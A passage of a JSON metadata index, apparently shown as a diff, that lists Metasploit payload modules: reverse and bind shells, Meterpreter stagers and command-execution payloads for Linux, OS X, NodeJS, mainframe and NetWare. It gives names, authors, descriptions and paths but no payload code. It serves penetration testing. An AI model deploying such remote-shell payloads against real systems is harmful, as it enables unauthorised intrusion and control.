"Linux Command Shell, Find Port Inline", - "fullname": "payload/linux/x86/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/shell_find_port.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/shell_find_tag": { - "name": "Linux Command Shell, Find Tag Inline", - "fullname": "payload/linux/x86/shell_find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a shell on an established connection (proxy/NAT safe)", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/shell_find_tag.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell_find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/shell_reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/linux/x86/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle ", - "joev " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/shell_reverse_tcp_ipv6": { - "name": "Linux Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/linux/x86/shell_reverse_tcp_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Matteo Malvica " - ], - "description": "Connect back to attacker and spawn a command shell over IPv6", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell_reverse_tcp_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/zarch/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/zarch/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "zarch", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/zarch/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/zarch/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/zarch/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "zarch", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/zarch/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/zarch/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/zarch/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "zarch", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/zarch/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_mainframe/shell_reverse_tcp": { - "name": "Z/OS (MVS) Command Shell, Reverse TCP Inline", - "fullname": "payload/mainframe/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Bigendian Smalls" - ], - "description": "Listen for a connection and spawn a command shell.\n This implementation does not include ebcdic character translation,\n so a client with translation capabilities is required. MSF handles\n this automatically.", - "references": [], - "platform": "Mainframe", - "arch": "zarch", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/mainframe/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "mainframe/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_multi/meterpreter/reverse_http": { - "name": "Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)", - "fullname": "payload/multi/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves" - ], - "description": "Handle Meterpreter sessions regardless of the target arch/platform.\n\nTunnel communication over HTTP", - "references": [], - "platform": "Multi", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/multi/reverse_http.rb", - "is_install_path": true, - "ref_name": "multi/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "multi/meterpreter", - "stager_refname": "multi/reverse_http" - }, - "payload_multi/meterpreter/reverse_https": { - "name": "Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)", - "fullname": "payload/multi/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves" - ], - "description": "Handle Meterpreter sessions regardless of the target arch/platform.\n\nTunnel communication over HTTPS", - "references": [], - "platform": "Multi", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/multi/reverse_https.rb", - "is_install_path": true, - "ref_name": "multi/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "multi/meterpreter", - "stager_refname": "multi/reverse_https" - }, - "payload_netware/shell/reverse_tcp": { - "name": "NetWare Command Shell, Reverse TCP Stager", - "fullname": "payload/netware/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "toto" - ], - "description": "Connect to the NetWare console (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Netware", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/netware/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "netware/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "netware/shell", - "stager_refname": "netware/reverse_tcp" - }, - "payload_nodejs/shell_bind_tcp": { - "name": "Command Shell, Bind TCP (via nodejs)", - "fullname": "payload/nodejs/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "joev " - ], - "description": "Creates an interactive shell via nodejs", - "references": [], - "platform": "NodeJS", - "arch": "nodejs", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/nodejs/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "nodejs/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_nodejs/shell_reverse_tcp": { - "name": "Command Shell, Reverse TCP (via nodejs)", - "fullname": "payload/nodejs/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan", - "joev " - ], - "description": "Creates an interactive shell via nodejs", - "references": [], - "platform": "NodeJS", - "arch": "nodejs", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/nodejs/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "nodejs/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_nodejs/shell_reverse_tcp_ssl": { - "name": "Command Shell, Reverse TCP SSL (via nodejs)", - "fullname": "payload/nodejs/shell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan", - "joev " - ], - "description": "Creates an interactive shell via nodejs, uses SSL", - "references": [], - "platform": "NodeJS", - "arch": "nodejs", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb", - "is_install_path": true, - "ref_name": "nodejs/shell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/aarch64/exec": { - "name": "OSX aarch64 Execute Command", - "fullname": "payload/osx/aarch64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "alanfoster" - ], - "description": "Execute an arbitrary command", - "references": [], - "platform": "OSX", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-12-30 16:26:31 +0000", - "path": "/modules/payloads/singles/osx/aarch64/exec.rb", - "is_install_path": true, - "ref_name": "osx/aarch64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/aarch64/meterpreter/reverse_tcp": { - "name": "OSX Meterpreter, Reverse TCP Stager", - "fullname": "payload/osx/aarch64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "parchedmind", - "nologic", - "timwr", - "usiegl00" - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/CylanceVulnResearch/osx_runbin", - "URL-https://github.com/nologic/shellcc" - ], - "platform": "OSX", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-07-31 20:30:30 +0000", - "path": "/modules/payloads/stagers/osx/aarch64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/aarch64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/aarch64/meterpreter", - "stager_refname": "osx/aarch64/reverse_tcp" - }, - "payload_osx/aarch64/meterpreter_reverse_http": { - "name": "OSX Meterpreter, Reverse HTTP Inline", - "fullname": "payload/osx/aarch64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr", - "usiegl00" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "OSX", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-10-14 15:43:40 +0000", - "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "osx/aarch64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/aarch64/meterpreter_reverse_https": { - "name": "OSX Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/osx/aarch64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr", - "usiegl00" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "OSX", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-10-14 15:43:40 +0000", - "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "osx/aarch64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/aarch64/meterpreter_reverse_tcp": { - "name": "OSX Meterpreter, Reverse TCP Inline", - "fullname": "payload/osx/aarch64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr", - "usiegl00" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "OSX", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-10-14 15:43:40 +0000", - "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/aarch64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/aarch64/shell_bind_tcp": { - "name": "OS X x64 Shell Bind TCP", - "fullname": "payload/osx/aarch64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "alanfoster" - ], - "description": "Bind an arbitrary command to an arbitrary port", - "references": [], - "platform": "OSX", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-02-01 01:05:40 +0000", - "path": "/modules/payloads/singles/osx/aarch64/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/aarch64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/aarch64/shell_reverse_tcp": { - "name": "OSX aarch64 Shell Reverse TCP", - "fullname": "payload/osx/aarch64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "alanfoster" - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-02 14:13:07 +0000", - "path": "/modules/payloads/singles/osx/aarch64/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/aarch64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/armle/execute/bind_tcp": { - "name": "OS X Write and Execute Binary, Bind TCP Stager", - "fullname": "payload/osx/armle/execute/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "OSX", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/armle/bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/armle/execute/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/armle/execute", - "stager_refname": "osx/armle/bind_tcp" - }, - "payload_osx/armle/execute/reverse_tcp": { - "name": "OS X Write and Execute Binary, Reverse TCP Stager", - "fullname": "payload/osx/armle/execute/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "OSX", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/armle/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/armle/execute/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/armle/execute", - "stager_refname": "osx/armle/reverse_tcp" - }, - "payload_osx/armle/shell/bind_tcp": { - "name": "OS X Command Shell, Bind TCP Stager", - "fullname": "payload/osx/armle/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "OSX", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/armle/bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/armle/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/armle/shell", - "stager_refname": "osx/armle/bind_tcp" - }, - "payload_osx/armle/shell/reverse_tcp": { - "name": "OS X Command Shell, Reverse TCP Stager", - "fullname": "payload/osx/armle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "OSX", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/armle/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/armle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/armle/shell", - "stager_refname": "osx/armle/reverse_tcp" - }, - "payload_osx/armle/shell_bind_tcp": { - "name": "Apple iOS Command Shell, Bind TCP Inline", - "fullname": "payload/osx/armle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/armle/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/armle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/armle/shell_reverse_tcp": { - "name": "Apple iOS Command Shell, Reverse TCP Inline", - "fullname": "payload/osx/armle/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/armle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/armle/vibrate": { - "name": "Apple iOS iPhone Vibrate", - "fullname": "payload/osx/armle/vibrate", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded.\n Based on work by Charlie Miller .", - "references": [], - "platform": "OSX", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/armle/vibrate.rb", - "is_install_path": true, - "ref_name": "osx/armle/vibrate", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/ppc/shell/bind_tcp": { - "name": "OS X Command Shell, Bind TCP Stager", - "fullname": "payload/osx/ppc/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "OSX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/ppc/bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/ppc/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/ppc/shell", - "stager_refname": "osx/ppc/bind_tcp" - }, - "payload_osx/ppc/shell/find_tag": { - "name": "OS X Command Shell, Find Tag Stager", - "fullname": "payload/osx/ppc/shell/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nUse an established connection", - "references": [], - "platform": "OSX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/ppc/find_tag.rb", - "is_install_path": true, - "ref_name": "osx/ppc/shell/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/ppc/shell", - "stager_refname": "osx/ppc/find_tag" - }, - "payload_osx/ppc/shell/reverse_tcp": { - "name": "OS X Command Shell, Reverse TCP Stager", - "fullname": "payload/osx/ppc/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "OSX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/ppc/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/ppc/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/ppc/shell", - "stager_refname": "osx/ppc/reverse_tcp" - }, - "payload_osx/ppc/shell_bind_tcp": { - "name": "OS X Command Shell, Bind TCP Inline", - "fullname": "payload/osx/ppc/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/ppc/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/ppc/shell_reverse_tcp": { - "name": "OS X Command Shell, Reverse TCP Inline", - "fullname": "payload/osx/ppc/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/ppc/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x64/dupandexecve/bind_tcp": { - "name": "OS X dup2 Command Shell, Bind TCP Stager", - "fullname": "payload/osx/x64/dupandexecve/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo", - "nemo " - ], - "description": "dup2 socket in edi, then execve.\n\nListen, read length, read buffer, execute", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x64/dupandexecve/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x64/dupandexecve", - "stager_refname": "osx/x64/bind_tcp" - }, - "payload_osx/x64/dupandexecve/reverse_tcp": { - "name": "OS X dup2 Command Shell, Reverse TCP Stager", - "fullname": "payload/osx/x64/dupandexecve/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo", - "nemo " - ], - "description": "dup2 socket in edi, then execve.\n\nConnect, read length, read buffer, execute", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x64/dupandexecve/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x64/dupandexecve", - "stager_refname": "osx/x64/reverse_tcp" - }, - "payload_osx/x64/dupandexecve/reverse_tcp_uuid": { - "name": "OS X dup2 Command Shell, Reverse TCP Stager with UUID Support (OSX x64)", - "fullname": "payload/osx/x64/dupandexecve/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo", - "timwr" - ], - "description": "dup2 socket in edi, then execve.\n\nConnect back to the attacker with UUID Support (OSX x64)", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2021-02-16 13:56:50 +0000", - "path": "/modules/payloads/stagers/osx/x64/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": 